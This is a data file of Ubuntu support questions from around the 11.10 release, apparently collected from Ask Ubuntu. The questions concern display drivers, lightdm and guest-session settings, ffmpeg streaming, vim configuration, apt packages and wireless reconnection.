74298	quick drawing tool	i 'm in need of some vector drawings ... was rushed to install inkscape , as is the tool i use more often , but it is too bloated and heavy for the task at hand ... i was thinking in something like fireworks , that let 's you create bitmaps in a very vector-like workflow , or something like the old flash editor that would blend shapes if they had the same color . do you know of any app simpler than inkscape or along the lines of those products description ?
74299	what did i do to make ubuntu fail to attempt to connect to one specific ip address ?	i have a very weird problem . i am running 11.10 on one of my computers which has the primary purpose of running xbmc . this computer can not connect to mirrors.xbmc.org , which has addons , updates , etc . baker : ~ $ ping mirrors.xbmc.org ping mirrors.xbmc.org ( 212.110.166.220 ) 56 ( 84 ) bytes of data . from baker.local ( 192.168.1.100 ) icmp_seq=1 destination host unreachable from baker.local ( 192.168.1.100 ) icmp_seq=2 destination host unreachable from baker.local ( 192.168.1.100 ) icmp_seq=3 destination host unreachable but ! baker : ~ $ ping canonical.com ping canonical.com ( 91.189.94.253 ) 56 ( 84 ) bytes of data . 64 bytes from vostok.canonical.com ( 91.189.94.253 ) : icmp_req=1 ttl=47 time=184 ms 64 bytes from vostok.canonical.com ( 91.189.94.253 ) : icmp_req=2 ttl=47 time=184 ms 64 bytes from vostok.canonical.com ( 91.189.94.253 ) : icmp_req=3 ttl=47 time=184 ms pretty much any other site on the internet that i 've randomly tries also works . from another computer on the network : cypress : ~ $ ping mirrors.xbmc.org ping mirrors.xbmc.org ( 212.110.166.220 ) 56 ( 84 ) bytes of data . 64 bytes from atlantis.xbmc.org ( 212.110.166.220 ) : icmp_req=1 ttl=48 time=186 ms 64 bytes from atlantis.xbmc.org ( 212.110.166.220 ) : icmp_req=2 ttl=48 time=186 ms 64 bytes from atlantis.xbmc.org ( 212.110.166.220 ) : icmp_req=3 ttl=48 time=194 ms if i try pinging the ip directly , the same thing results . it does not look like a dns problem , something else . i 've grepped my entire /etc folder for either that url or that ip address to see if i had accidentally set something to 'please fail on this ip ' . nothing . also , a tracepath from baker , the bad machine : baker : ~ $ tracepath 212.110.166.220 1 : baker.local 0.081ms pmtu 1500 1 : baker.local 3001.459ms ! h resume : pmtu 1500 it almost seems like that machine has decided that it just ca n't route to it . from what i gather ! h means the host is unavailable . which it is n't . i lack the networking terminology to search further and could use some help in identifying what 's going on here .
74300	how to login into unity 2d ?	i have installed ubuntu 11.10 on my laptop . it loads unity 3d . but , i want to login into unity-2d . how do i do that ?
74307	move indicator notification panel to extreme right in xfce desktop session	i need help setting up indicator notification panel to extreme right . i have setup global menu i found here enter link description here this is what i m getting and this is wat i want it to look like , notifications to extreme right ... if you get my drift ... . i want it to look like the unity panel basically i wan na turn it into a mac clone ...
74309	synaptic package manager is missing	there is no synaptic package manager in 11.10 , how should i completely remove ( purge ) an installed application ? does clicking on `` install '' on any software in ubuntu software centre means that the command sudo apt-get install xxxxxxx will be used in the background ?
74310	ssd + trim + ext4 ok. what about lvm and raid ?	i 've read that ssd trim is now supported in the recent kernels with ext4 too ( see how to enable trim ? ) . is it ok/safe to enable trim when having a ) lvm b ) raid1+lvm ? thanks !
74313	list and enable/disable compiz plugins on command line	how can i see the default set of compiz plugins and add or remove plugins from the set using the command line interface ? is there a config file i can edit for system-wide configuration ?
74317	how can i turn network interface ( localhost ) on ?	localhost is off on my machine . it 's described in my /etc/network/interfaces : auto lo iface lo inet loopback auto eth1 iface eth1 inet dhcp but when i run route route -n '' with wireless off i get : kernel ip routing table destination gateway genmask flags metric ref use iface how can i turn it on ?
74321	adding ntfs-write capability by default	in 11.10 the ability to write to ntfs drives was removed . there are ways around this , like ntfs-config , which mounts the selected drives as r/w , but i 'm looking for a more permanent solution . i have also tried enabling it in the kernel ( when compiling ) but that does n't seem to do anything . tl : dr i want for ntfs drives ( including removable ones ) to be mounted r/w instead of r/o ( from gnome-shell and nautilus ) , like in 10.10 and 11.04
74322	why does flash player need `` ttf-mscorefonts '' in order for flash player to work ?	could someone tell me why flash player needs ttf-mscorefonts to work ?
74332	ca n't click the allow button in flash	every time i want to enable my webcam or microphone in my browser , the regular flash screen pops up and i need click allow or deny . however i can not click allow or deny , it is not responding to my clicks . does anyone know a fix ?
74333	ca n't install gnome-shell in ubuntu 11.10	help me please ... . i ca n't install gnome-shell in ubuntu 11.10 i follow this tutor sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install gnome-shell gnome-session sudo apt-get -f install sudo apt-get install gnome-shell sudo apt-get install gnome-session but when i try to run `` sudo apt-get install gnome-shell gnome-session '' i have some error this error : the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell : depends : gnome-icon-theme-full but it is not going to be installed recommends : gnome-session-fallback but it is not going to be installed e : unable to correct problems , you have held broken packages . please help me ... .. t_t
74334	how to modify configuration file from command line ?	for example , i often need to login to a new virtual machine just to open `` /etc/ssh/sshd_config '' and set `` passwordauthentication '' option to `` no '' . in this way , i can not automate this process . how to solve similar tasks by doing the modification from the command line ?
74335	how to remount a drive as rewritable ?	whenever i mount some of my partitions from the computer menu , they are mounted as read only and i want to fix it . as per the the help doc and a previous answer from another question i tried with command mount /dev/sda5 -o remount-rw /media/mydrive , but this did n't work .
74337	binding mouse to keyboard keys	hi i have a logitech mx revolution mouse and am trying to bind some of its buttons to keyboard keys , following this guide : http : //www.devnetwork.net/viewtopic.php ? f=30 & t=95073 i found the keys on the keyboard and the curresponding buttons on the mouse , and mapped them as indicated , however the buttons still do not have any response when i press them . am i missing something ? in /home/.xbindkeysrc i have : '' xdotool key alt_l '' b:13 '' xdotool key shift + shift_l '' b:15
74338	unhandled kernel version error when trying to install laptop-mode-tools	hi i 'm getting this error after installing laptop-mode-tools in oneiric ocelot when its trying to run for the first time : unhandled kernel version : 3.0 ( 'uname -r ' = 3.0.0-12-generic ) so my laptop-mode-tools is 1.57-1ubuntu1 , and i saw in the launchpad that ubuntu team is preparing 1.58-3ubuntu1 that contains support for kernel 3.0 . however , i do n't find 1.58-3ubuntu1 in apt-cache showpkg laptop-mode-tools ( only 1.57 is listed ) so i ca n't upgrade my laptop-mode-tools . i tried adding kernel ppa into my repository cache and apt-get update , and in apt-cache showpkg linux-headers only 3.0.0.12-generic is showing up . so i ca n't downgrade my kernel either . i want laptop-mode-tools to work with oneiric since i 'm on laptop , what do you guys suggest me to do ? i 'm an absolute beginner so please be easy on your answer . i can work with packages , but not with patching/compiling , etc .
74341	ubuntu one synchronization problems after reinstallation of ubuntu	installed u1 on my ubuntu 11.10 , synchronized flawlessly towards my smartphone . wanted to get rid of windows as second os , and backed up by deja dup and reinstalled ubuntu 11.10 . after synchronization did not work properly . synchronized folders in home directory reported : this folder is backed up and will be synchronized with the other computer . no other computer on the net . refers probably to the previous installation of u10.11 . how can i get my home folders synchronized ?
74343	guest session in ubuntu 11.10	i try remove guest session from lightgdm by adding string allow-guest=false in /etc/lightgdm/lightgdm.conf . after this i restarted it by command /etc/init.d/lightgdm restart and guest session really disappears . but after reboot my os did n't boot , and i not found any errors in console . looks like lightgdm ca n't start after this modification . i switched to console by alt+f2 , removed modification in conf-file , restart system and it boots normally . so my question is : how to disable guest session in fresh ubuntu 11.10 with lightgdm 1.0.1 . working lightgdm.conf : [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu not working : [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu allow-guest=false
74344	is it possible to change the displayed name of the keyboard layout ?	i would like to change the displayed name of the keyboard layout indicator â for example , right now mine reads en , ru or uk which does not look nice on the panel . is it possible ? can i edit some configuration file and make it read english , russian or ukrainian ?
74345	how do i bypass/ignore the gpg signature checks of apt ?	all of the key-servers i visit are timing out . i need to install packages without checking the signatures of the public keys . is there a way to bypass all the signature checks/ignore all of the signature errors or fool apt into thinking the signature passed ? i am very well aware it is dangerous to do this
74349	is there a program to search for files in local networks ?	does anyone know if there is a program to search for files in lans ? or is this possbile with nautilus ? i already tried it with nautilus but there were no search results ( no matter what i looked for ) .
74351	does an asus pa* series display work with ubuntu ?	i 'm thinking of purchasing an asus pa246q 24 '' monitor but it has a bunch of extra features which i do n't know if it will work with ubuntu . i ca n't find any details on system requirements or any of that kind of information so i guess it is all done inside of the monitor and does n't use the computer for that kind of stuff . can anyone with some experience regarding this help me out ? so that i do n't buy something i will regret : ) asus pa246q 24
74353	virtual terminal switching with a multiseat setup and lightdm	my aim is to have two seats for my ubuntu machine . one of the monitors is a usb touchscreen from mimo with a displaylink chip . i already got it working as main display just by reconfiguring xorg.conf . even the touch interface works . but for multiseats , it 's not just enough to change xorg.conf , because additional login screens have to be started too . this has to go into the lightdm configuration . by configuring lightdm for multiseats ( lightdm.conf ) , i managed to start up two x instances , one for each serverlayout ( xorg.conf ) . one is running on virtual terminal 7 ( vt7 ) and one on vt8 . as is commonly known , you can switch between virtual terminals with the shortcuts ctrl + alt + fx ( where x is the terminal number ) . now the problem is this : by default , vt7 is enabled and vt8 is disabled . but when i switch to vt8 , it becomes enabled but vt7 becomes disabled . how can i make both x server terminals/servers run in parallel ? thank you . here is my lightdm.conf [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu [ seat:0 ] xserver-layout=default [ seat:1 ] xserver-layout=displaylink here are only the relevant parts of my xorg.conf : # two server layouts section `` serverlayout '' identifier `` default '' screen 0 `` screen0 '' 0 0 inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` serverlayout '' identifier `` displaylink '' screen `` displaylinkscreen '' inputdevice `` mouse1 '' endsection # two screens section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` displaylinkscreen '' device `` displaylinkdevice '' monitor `` displaylinkmonitor '' subsection `` display '' depth 24 modes `` 800x480 '' endsubsection endsection # two monitors section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` displaylinkmonitor '' endsection # two graphics cards/interfaces section `` device '' identifier `` card0 '' driver `` nvidia '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` displaylinkdevice '' driver `` displaylink '' option `` fbdev '' `` /dev/fb1 '' endsection # three input devices ( the last is touchscreen of the usb monitor ) section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` inputdevice '' identifier `` mouse1 '' driver `` mouse '' option `` device '' `` /dev/input/by-path/pci-0000:00:1d.7-usb-0:1.3:1.0-event '' endsection
74356	is it possible to install ubuntu 10.04 on ext3 instead of ext4 ?	is it possible to install ubuntu 10.04 on ext3 instead of ext4 ? this is because i want to use my backup program `` acronis '' to save an image of the whole partition .
74357	nautilus with panel in unity and without in gnome shell	there are a few question with this topic but i gioit a new twist to it : i want the panel integration of nautilis in unity but not in gnome shell . background : i 'm in state of evaluating gnome shell , so i change desktops quite often . so nautilus should work in both environments as file manager , and in unity on the desktop . but not in gnome shell . removing the panle extension from nautilus as suggest e.g . in gnome shell with desktop icons without unity file manager is not an option . any ideas on how to disable that peculiar extension only for gnome shell ?
74371	how to install 32-bit version of libstdc++.so.6 on a 64 bit machine	i need to install the 32-bit version of libstdc++.so.6 on a 64 bit ubuntu 8.04.2 server . when i tried apt-get install ia32-libs , it says root @ devserver : ~/downloads # apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done ia32-libs is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 133 not upgraded . but when i tried to enable a php extension ( libpdf_php.so ) , which uses this runtime library following error is logged in php error log . root @ devserver : ~/downloads # cat /var/log/apache2/php_error.log [ 01-nov-2011 16:54:09 ] php warning : php startup : unable to load dynamic library '/usr/lib/php5/20060613/libpdf_php.so ' - /usr/lib/php5/20060613/libpdf_php.so : wrong elf class : elfclass32 in unknown on line 0 root @ devserver : ~/downloads #
74377	keyboard shortcut to open an application in new workspace in gnome shell 3.2	i am running gnome shell 3.2 on ubuntu 11.10 . i generally launch application from meta-key , followed by a few characters , followed by up-down arrows , followed by enter . the applications launch in the same workspace . is there a keyboard shortcut so that i can open the application in a new workspace ? if not by default , is there any way in which it can be done ? ( alt-enter or shift-enter , etc )
74378	is there a way to turn nautilus into dual pane manager	i want to add/edit nautilus actions . i know how to add a custom command , just dont know the syntax of the commands : open dir in current window cntr+number ( for each location ) copy to other pane f5 move to other pane f6 new dir f7 and others i would like to start nautilus in dual pane mode by default . a link with nautilus commands available will be very helpful .
74382	how do i install ubuntu when i already have meego pre-installed on a samsung n100 netbook ?	i have meego pre-installed on my netbook samsung n100 and hate it . can anyone give me step by step guide to change over to ubuntu as i am a complete newbie to this stuff ! thanks for any help !
74385	slow wifi on a dell e6500 with an intel 5100 wireless card	moved to ubuntu 11.10 last week ( clean install ) , and noticed that wifi connection is highly unstable and slow . update found a solution ! https : //bugs.launchpad.net/ubuntu/+source/network-manager/+bug/836250/comments/42 iperf shows average speed around 150-200 kb/s i also tried with my second laptop ( dell vostro 1520 , broadcom chip ) and it works fine - average speed is around 4 mb/s so it 's not a problem with my wifi access point or with interfering networks . it was working fine in 11.04 and 10.04 , so it 's a problem with new 11.10 iwconfig : wlan0 ieee 802.11abgn essid : '' rg '' mode : managed frequency:2.447 ghz access point : bc : ae : c5 : c3 : e8 : f7 bit rate=81 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=61/70 signal level=-49 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:4276 invalid misc:16043 missed beacon:0 lshw : *-pci:1 description : pci bridge product : 82801i ( ich9 family ) pci express port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 03 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport:4000 ( size=4096 ) memory : f6900000-f69fffff ioport : f0600000 ( size=2097152 ) *-network description : wireless interface product : wifi link 5100 vendor : intel corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : wlan0 version : 00 serial : 00:21:5d : e3 : a5:2a width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-12-generic-pae firmware=8.83.5.1 build 33692 ip=192.168.1.215 latency=0 link=yes multicast=yes wireless=ieee 802 resources : irq:47 memory : f69fe000-f69fffff can i fix it somehow ? ..
74386	installation stopped at `` configuring target system ''	ca n't install on an old pentium 4 with 1gb ram i started installing 11.10 and it stopped while `` configuring target system '' . what is wrong ?
74387	my fan turns off after a few seconds	can you please help , i can not get the fan to come on at all when running 11.10 , it works fine in windows so obviuosly not the fan itself , it comes on for about 5 seconds when laptop initially turned on , then will not come on after that , even if left on untill cpu gets so hot laptop crashes .
74391	gui not started after installing cuda dev driver	currently i 'm working on cuda.i 've lenovo z570 laptop which comes with geforce gt520m with cuda support with ubuntu 10.10.i downloaded dev drivers from nvidia.com and installed properly ( with shutting down gdm n all ) , but after installation gui has not started , it starts with text console and asks for login.i checked status of gdm , it is running but still nothing is displayed on screen..please help me stuck since last 2 days ... by the way does my device has optimus technology ? if it is so i need to install bumblebee ...
74398	what is the mirror for installing updates ?	what is the mirror for installing updates ? why it is showing different no . of updates when i changed the url in /etc/apt/source.list to different url ?
74408	what are the default file permissions for the home folder ?	i have somehow inadvertently altered the file permissions of my home directory . i wish to change them back to the default permissions . however , i canâ´t seem to find out what the default is . currently , i have set them to : drwx -- -- -- what should they be ? does it change depending on if you have your home folder encrypted ?
74412	how to make sure that gcc , binutils , make and the kernel source are installed ?	i installed kubuntu in a vmware virtual machine . i am trying to share files between my host and guest os , which requires to install the vmware tool set . when running the vmware toolset installation it asks me to make sure that gcc , binutils , make and the kernel sources are installed . does anyone know what all the kernel sources entails ?
74413	how do i get a canon lbp 2900 b printer working ?	i am using ubuntu 11.10 , i have a canon lbp 2900 b model printer . i installed two .deb driver packeges ( cndrvcups-capt , cndrvcups-common ) with gs-esp dependency package , then configured the printer , using informations given in the ubuntu community and from many other sources from the internet . i am sure that all configurations are right according rules ( ccp : /var/ccpd/fifo0 ) but when i give a print -nothing happens ( not printing ) . i saw another matter - a new printer automatically configured ( lbp2900-2 ) in device uri usb : //canon/lbp2900 using ubuntu 11.04 , i installed the printer with the same method cited above , then i printed a test page and many other pages successfully , but after restarting the pc , trying to print - nothing happens . i saw that a second printer configured in the address usb : //canon/lbp2900 i connect canon lbp2900 with computer using usb port
74414	why did super + w stop working ?	super + w used to zoom out and show all open windows and workspaces , but it has stopped working . how can i re-activate that ?
74416	`` error while opening encoder '' problem with ffmpeg	since a few days i am trying to get ffmpeg working in relation with ffserver . i would like to stream a live video source from /dev/video0 to the ffserver . i have to tell you , in ubuntu 10.4.3 it was simply working installed via apt-get install ffmpeg and with this command line : ffserver & ffmpeg -r 15 -s 352x288 -f video4linux2 -i /dev/video0 http : //localhost:8090/feed1.ffm ffserver.conf : port 8090 bindaddress 0.0.0.0 maxhttpconnections 2000 maxclients 1000 maxbandwidth 10000 customlog - nodaemon file /tmp/feed1.ffm filemaxsize 5m acl allow 127.0.0.1 feed feed1.ffm format swf videoframerate 5 videobitrate 320 videoqmin 1 videoqmax 3 videosize 352x288 noaudio now in ubuntu 11.10 ffserver is running fine : root @ ubuntu : ~ # ffserver ffserver version git-2011-11-01-f955fdc , copyright ( c ) 2000-2011 the ffmpeg developers built on nov 1 2011 11:26:00 with gcc 4.6.1 configuration : libavutil 51 . 22 . 0 / 51 . 22 . 0 libavcodec 53 . 26 . 0 / 53 . 26 . 0 libavformat 53 . 18 . 0 / 53 . 18 . 0 libavdevice 53 . 4 . 0 / 53 . 4 . 0 libavfilter 2 . 45 . 3 / 2 . 45 . 3 libswscale 2 . 1 . 0 / 2 . 1 . 0 tue nov 1 15:12:09 2011 ffserver started . but , if i start the above command line in that ffmpeg version , i got the following : root @ ubuntu : / # ffmpeg -s 352x288 -f video4linux2 -i /dev/video0 http : //localhost:8090/feed1.ffm ffmpeg version git-2011-11-01-f955fdc , copyright ( c ) 2000-2011 the ffmpeg developers built on nov 1 2011 11:26:00 with gcc 4.6.1 configuration : libavutil 51 . 22 . 0 / 51 . 22 . 0 libavcodec 53 . 26 . 0 / 53 . 26 . 0 libavformat 53 . 18 . 0 / 53 . 18 . 0 libavdevice 53 . 4 . 0 / 53 . 4 . 0 libavfilter 2 . 45 . 3 / 2 . 45 . 3 libswscale 2 . 1 . 0 / 2 . 1 . 0 [ video4linux2 , v4l2 @ 0x178d8c0 ] estimating duration from bitrate , this may be inaccurate input # 0 , video4linux2 , v4l2 , from '/dev/video0 ' : duration : n/a , start : 15906.908910 , bitrate : 48660 kb/s stream # 0:0 : video : rawvideo ( yuy2 / 0x32595559 ) , yuyv422 , 352x288 , 48660 kb/s , 30 tbr , 1000k tbn , 30 tbc [ buffer @ 0x179b320 ] w:352 h:288 pixfmt : yuyv422 tb:1/1000000 sar:0/1 sws_param : [ buffersink @ 0x178fea0 ] auto-inserting filter 'auto-inserted scale 0 ' between the filter 'src ' and the filter 'out' [ scale @ 0x1792e80 ] w:352 h:288 fmt : yuyv422 - > w:352 h:288 fmt : yuv420p flags:0x4 [ buffer @ 0x179b4e0 ] w:352 h:288 pixfmt : yuyv422 tb:1/1000000 sar:0/1 sws_param : [ scale @ 0x17a9b80 ] w:352 h:288 fmt : yuyv422 - > w:640 h:480 fmt : yuv420p flags:0x4 [ mpeg1video @ 0x179ae20 ] codec type or id mismatches output # 0 , ffm , to 'http : //localhost:8090/feed1.ffm ' : stream # 0:0 : video : flv1 , yuv420p , 352x288 , q=1-3 , 320 kb/s , 1000k tbn , 30 tbc stream # 0:1 : video : flv1 , yuv420p , 640x480 , q=1-3 , 320 kb/s , 1000k tbn , 30 tbc stream mapping : stream # 0.0 - > # 0.0 ( rawvideo - > mpeg1video ) stream # 0.0 - > # 0.1 ( rawvideo - > mpeg1video ) error while opening encoder for output stream # 0.0 - maybe incorrect parameters such as bit_rate , rate , width or height dmesg easycap : :0easycap_usb_probe : registered with videodev : 1=minor [ 25.961352 ] easycap : :0easycap_usb_probe : ends successfully for interface 0 [ 25.961379 ] easycap : :0easycap_usb_probe : ends successfully for interface 1 [ 25.961386 ] easycap : :0easycap_usb_probe : audio hardware is ac'97 [ 25.961519 ] easycap : :0easycap_alsa_probe : registered easyalsa1 [ 25.961522 ] easycap : :0easycap_usb_probe : ends successfully for interface 2 [ 25.961548 ] usbcore : registered new interface driver easycap anyone an idea what i am doing wrong ? is there any alternative for stream a live content to a website ? thanks
74423	changing resolution with wine app opened freezes screen	whenever i try to change the resolution using nvidia-setting or the display manager with any wine program that uses graphics ( dead island , most wanted , anything with graphics really ) the screen freezes . am stuck there until i press escape , at least in the nvidia-setting since i have a couple of seconds to press escape and go back to the previous resolution settings . what can be done about this or is there a bug already mentioned ?
74433	external monitor resolution stuck at 1024x768	i have an hp-compaq 615 laptop that i connect up with an external 1440x900 monitor so that i can work with two screens . i was unable to get it to work correctly under natty . however , when i did a fresh install of ubuntu oneiric 64-bit , i expected no problems when connecting up my second monitor ... however , no matter what i do , i can not set the resolution any higher than 1024x768 , even though the monitor 's max resolution is 1440x900 . google searches have only been taking me to posts telling me to use the now-defuct xorg.conf which is useless , or to use various xrandr commands , which only give me error messages . does anyone know how to get ubuntu to recognize and use the monitor 's real resolution ? i am not using the proprietary fglrx driver because the laptop is much faster on the open-source driver .
74439	how to make authentication required to install updates ?	ubuntu 's new policy dictates that updates to already installed applications do n't require password when doing it from update manager ( synaptic and apt-get still require password ) . also , i would like to prevent the update manager to pop-up , it should only run when i invoke it . thanks .
74440	are there transcripts of uds sessions ?	i 've been trying to listen to one of the uds ( ubuntu developer summit ) sessions today - had a great deal of trouble with interference . are there transcripts available of sessions ?
74442	how to recover ubuntu home folder ?	i was having different partition that serverd as my home folder for safety . few days ago i had to format my system and i forgot to mount that partition as home folder ( /home ) . now i have the files but my settings and configurations are not restored as it is not my home . is there any way to mount that partition permanently as home or will i have to format again my details : samsung sf411 laptop with ubuntu 11.04
74446	error when installing vlc	my laptop model : dell n4110 i have just installed ubuntu 11.10 and tried to install vlc music player but it shows alert `` failed to download repository information , check your internet connection `` . but internet is connected . what should i do ? ? ? ?
74447	black screen and no sound after login	my notebook is asus u31sd and i 'm using ubuntu 11.10 with gnome-shell and i 'm having this weird problem that after login i can hear start sound and i barely see the desktop . to fix it i need to press every time fn+f6 ( more brightness ) . i have tried to modify rc.local by adding echo 0 ( or 10 ) > /sys/class/backlight/acpi_video0/brightness here is the rc.local file : # ! /bin/sh -e # # rc.local echo 0 > /sys/class/backlight/acpi_video0/brightness but i do n't know why it does n't work . if i do an echo from terminal command is working . any help will be appreciated .
74451	how to login using ubuntu single sign on ?	i 'm developing a web app that will be able to access user 's file on ubuntu one . sites like github , twitter , facebook , when an app request access to the user profile usually open a popup asking if you want to give the app the access while in this page about ubuntu one api is written that i need to make a get request with some parameters like email and password : so the user give the application not only the access but also the app can store user password which is not very secure ... am i right or is there the possibility of a popup ?
74454	start development in ubuntu	i used to develop desktop applications for windows , i know how to develop using c++ , c # , and java . i would like to start development for ubuntu , how to get started ?
74455	how to re-create missing vim directory ?	the /etc/vim directory and the symlinks from /usr/share/vim to it are missing . does anyone know how to re-create the directory and links ? i 've already tried : sudo apt-get purge vim sudo apt-get install vim
74459	kupfer rhythmbox plugin not working	after i installed unity , first the kupfer launcher worked well with the rhythmbox songs ( i have the option checked ) . but now , it does n't play any song on rhythmbox . any help ?
74463	no user name/password required when exploring from live usb ?	a few months back when i buggered up my netbook and then booted into it to get information from it using a live usb . ( thinking that was 10.10 ) when i was copy/pasting this to another usb at no time was i required to enter my user name or password to access this information . why and how was that possible ? should n't that not be possible ? this was information from the 'home ' including documents , pictures , music , videos and some other locations . this does not sound secure at all , is there any way that i can ensure this can not happen again and that user name and password would be required to access information on my installed ubuntu computer when booting on that computer from a live usb/cd/dvd ?
74464	usb mouse/keyboard not working	i installed ubuntu 11.10 after booting it from a usb drive . everything worked fine there , after booting the keyboard worked in grub but not after ubuntu was booted . i can unplug either of them and plug them in via a ps2/usb adapter and the device will work . after switching a couple of times , i got the keyboard and mouse both working via usb but after i rebooted either stopped working . how can i fix this ? the mouse is a razer krait and the keyboard is a logitech classickeyboard 200 .
74468	how to share a folder with a host machine ?	using vmware , i am running kubuntu as a guest os on top of a windows os . i have tried installing the vmware tools but it fails to initialise the guest os system daemon . it seems to be a fairly common problem , and can become quite a headache to solve . someone recommended to install open-vm-tools but there is not much information about and i do not know where to start . any one has done this before . any help on how to share my files between my windows host os and linux guest os will be greatly appreciated .
74471	how do i get my ati 6670 graphics card to work ?	i had ubuntu 11.10 working absolutely fine with my previous ( ati 4870 ) card and 2 monitors . unfortunately , after replacing this card with the ati 6670 and 3 monitors , i 've been struggling with getting everything working properly . initially , i had a mirrored dispay on all 3 screens but trying to change this with the catalyst control ( with admin privileges ) resulted in the control closing without saving the changes ( after clicking on apply ) . therefore , i decided to remove the proprietary drivers to see if the open source ones would work or if reinstalling them would help . i followed the instructions on number 2 of this site : https : //wiki.ubuntu.com/x/troubleshooting/fglrxintefereswithradeondriver # problem : % 20 % 20need % 20to % 20fully % 20remove % 20-fglrx % 20and % 20reinstall % 20-ati % 20from % 20scratch after restarting , i can see the ubuntu loading screen on all 3 but then afterwards i get no display on any of them . after upgrading to 11.10 , i also do n't see the grub boot loader any longer so i ca n't try going into safe mode to make further changes . what can i do ?
74472	ubuntu halts after booting	my ubuntu 11.10 halts for about 10seconds after booting and this happen each time i login , just during the first hour of usage . this situation is like this : the screen starts to dim and all applications stop working music stops , browsing , even the mouse pointer disappears for about 10 secs and it happens 2 or 3 time consequently , my laptop specs is as follows : hp pavilion dv6000 , nvidia geforce 8400gs , 2.50 ghz core 2 duo , 2.00 gb ram . thanks in advance for your help . regards ,
74473	unhandeled lockdown error ( -15 ) when i try to connect my iphone 4s	could anyone please help me ? ? when i try to connect my iphone 4s i get this message : unhandeled lockdown error ( -15 ) . it worked just fine so far and i have no idea how to fix it .
74474	gnome shell consumes 100 % cpu	i am running gnome shell 3.2 on ubuntu 11.10 . after resuming from suspend , gnome shell process always consumes 100 % cpu . is there any solution for this ?
74478	how to install only the dependencies of a package ?	running sudo apt-get install < package > will install the package , its dependencies , and any other recommended packages . however , there does not seem to be a way to install only the dependencies of a package and exclude the package itself . how would one go about doing this ?
74479	how do i limit administrative tasks for normal users ?	i want to limit administrative tasks , so users can not mess up the system . my idea was to install ubuntu , set up automatic login , and hand it to the users without them knowing the password . however , i now need to disable automatic login , and let the users lock their screen too , but if i give them the password for these task , they will also be able to manage the system . so , is there any way to set different passwords for administrative tasks ( updates , installations , sudo ) and session tasks ( login , lock screen , etc ) ?
74480	how do i check if i have the exact same deb as installed on a system	when building packages for internal company projects , sometimes we loose track of the package source and only have the binary .deb . even worse , the package builder may install it onto a production system but forget to drop it in yum and later leave the company . some point in the future we need to build a new server and want to ensure that the .deb we found in the engineer 's home directory exactly matches the one on existing servers . is there a way to find out if the .deb is the exact same one ? on rpm based systems i would do the following old-server $ rpm -qi foo new-server $ rpm -qi -p foo-1.2.3.rpm and compare the size , build date , build host and if they match , then i know i have the exact rpm i need . is there an equivalent way of doing this on dpkg based systems ? i see that dpkg-query can return an md5 of some data , but the manual page says it 's related to dselect and i 'm unable to get any data from it .
74483	how do i remove the application title from global application menu ?	i 've disabled the global application menu by removing 'indicator-appmenu ' via apt . unfortunately , the window title still appears on the panel bar whenever i mouse over the application . does anyone know if there 's another indicator applet which can be removed to disable this effect ?
74484	guest os daemon failed . any idea why ?	i am running a guest ubuntu 11.10 on top of a host windows os . when installing the vmware tool set , somehow the execution is aborted . i realized that the guest operating system daemon failed to start . anyone knows why this might be happening ? thanks http : //pastebin.com/xhrkdkde for the log .
74485	how to display hidden characters in vim ?	how can i configure vim to display hidden characters like tabs or spaces only while those characters are typed ? i do not want tabs and/or space replaced with special characters like `` > '' or `` _ '' when the file is written .
74488	i ca n't seem to get any application indicators to show up - why not ?	i am trying to run a program that makes use of application indicators - but it is n't working . this could be because i am missing a package ( i did n't use the desktop installer cd to install ubuntu - i installed the core packages and then added others as needed ) . the application in question is written in python . here is a simple python script to check and see if app . indicators are working : import appindicator import gtk appindicator.indicator ( `` test '' , `` monitor '' , appindicator.category_application_status ) gtk.main ( )
74499	1080p external monitor through a dell xps 15 l502x ?	did someone succeed using an external monitor through the hdmi or mini displayport of the dell xps 15 l502x under ubuntu 11.10 . if so can you please tell me what you did ? the discrete graphics card is a nvidia gt525m 1 go . the cpu is an intel i7 2670qm with turbo boost . thanks in advance .
74500	why is the oneric-backport repository enable by default on 11.10 ?	i installed xubuntu 11.10 and ubuntu 11.10 in both the oneric-backport is enabled by default . any ideas why ?
74501	authenticate as root to view a folder ?	is there a way to setup nautilus so that when my user attempts to view a folder owned / locked by root , it asks for the root password ? kind of like running a nautilus browser using sudo , from the terminal .
74504	how do i set clicking on a screen edge to switch viewports ?	i remember being able to do this before , but i seem to have accidentally removed this setting in compiz . how do i turn it back on ?
74509	how to drag windows between 2 x servers ?	i have seen this question , and i would like something similar . when a new window is opened , i would like it to be shown on my primary monitor . then if there is a need , i would drag it to the secondary monitor . is there a way to do it ? i am using xfce and gnome , and i have 2 seperate x sessions .
74514	how to speed up the reconnection of wlan after sleep	i am using an hp netbook with a broadcom wl-card . i use the sta driver . after waking up from sleep it takes normally 30 seconds to be reconnected to my wlan . using the command sudo iwlist scanning the reconnection process starts immediately . i wrote a script echo $ password | sudo -s $ iwlist scanning and start it via a starter from the desktop , thus reducing the time to 15 sec . is there a way to start the script automatically and preventing the terminal from popping up .
